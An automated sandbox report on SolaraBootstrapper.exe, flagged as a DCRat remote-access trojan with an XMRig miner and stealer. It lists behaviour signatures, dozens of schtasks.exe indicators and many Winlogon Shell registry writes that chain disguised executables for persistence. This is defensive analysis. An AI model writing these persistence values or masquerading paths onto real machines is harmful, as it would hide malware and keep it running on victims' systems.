Malware Analysis Report

2024-11-15 05:53

Sample ID 240721-yckqsstdpm
Target SolaraBootstrapper.exe
SHA256 1f3a8ed14dcf8dd8b4a88787b08163b9e9d65d999e61645b90c0c91b6a8f71fd
Tags
rat dcrat xmrig execution infostealer miner persistence privilege_escalation spyware stealer
Score 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score 10/10

SHA256

1f3a8ed14dcf8dd8b4a88787b08163b9e9d65d999e61645b90c0c91b6a8f71fd

Threat Level: Known bad

The file SolaraBootstrapper.exe was found to be: Known bad.

Malicious Activity Summary

rat dcrat xmrig execution infostealer miner persistence privilege_escalation spyware stealer

Process spawned unexpected child process

DCRat payload

Dcrat family

xmrig

Modifies WinLogon for persistence

DcRat

XMRig Miner payload

DCRat payload

Command and Scripting Interpreter: PowerShell

Event Triggered Execution: AppInit DLLs

Loads dropped DLL

Reads user/profile data of web browsers

Checks computer location settings

Executes dropped EXE

.NET Reactor protector

Enumerates connected drives

Looks up external IP address via web service

Blocklisted process makes network request

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Runs ping.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-21 19:38

Signatures

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Dcrat family

dcrat

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-21 19:38

Reported

2024-07-21 19:51

Platform

win10v2004-20240709-en

Max time kernel

47s

Max time network

601s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\xdwdSublime Text.exe" C:\Users\Admin\AppData\Local\Temp\faildsfsdf.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\winNet\\fontdrvhost.exe\", \"C:\\winNet\\Refcrt.exe\", \"C:\\Users\\All Users\\Documents\\conhost.exe\", \"C:\\DriversavessessionDlldhcp\\sysmon.exe\", \"C:\\Recovery\\WindowsRE\\Refcrt.exe\", \"C:\\Users\\Admin\\AppData\\Local\\TrustedInstaller.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\winNet\\fontdrvhost.exe\", \"C:\\winNet\\Refcrt.exe\", \"C:\\Users\\All Users\\Documents\\conhost.exe\", \"C:\\DriversavessessionDlldhcp\\sysmon.exe\", \"C:\\Recovery\\WindowsRE\\Refcrt.exe\", \"C:\\Users\\Admin\\AppData\\Local\\TrustedInstaller.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\winNet\\fontdrvhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\winNet\\fontdrvhost.exe\", \"C:\\winNet\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\winNet\\fontdrvhost.exe\", \"C:\\winNet\\Refcrt.exe\", \"C:\\Users\\All Users\\Documents\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\winNet\\fontdrvhost.exe\", \"C:\\winNet\\Refcrt.exe\", \"C:\\Users\\All Users\\Documents\\conhost.exe\", \"C:\\DriversavessessionDlldhcp\\sysmon.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\csrss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\faildsfsdf.exe\", \"C:\\DriversavessessionDlldhcp\\Refcrt.exe\", \"C:\\Windows\\Vss\\Writers\\Application\\WmiPrvSE.exe\", \"C:\\Windows\\SKB\\LanguageModels\\RuntimeBroker.exe\", \"C:\\Program Files\\WindowsPowerShell\\dllhost.exe\", \"C:\\Program Files\\Uninstall Information\\SolaraBootstrapper.exe\", \"C:\\Windows\\Cursors\\smss.exe\", \"C:\\Users\\Default\\Pictures\\Registry.exe\", \"C:\\Recovery\\WindowsRE\\backgroundTaskHost.exe\", \"C:\\Windows\\fr-FR\\conhost.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\ja-JP\\smss.exe\", \"C:\\DriversavessessionDlldhcp\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\conhost.exe\", \"C:\\winNet\\fontdrvhost.exe\", \"C:\\winNet\\Refcrt.exe\", \"C:\\Users\\All Users\\Documents\\conhost.exe\", \"C:\\DriversavessessionDlldhcp\\sysmon.exe\", \"C:\\Recovery\\WindowsRE\\Refcrt.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
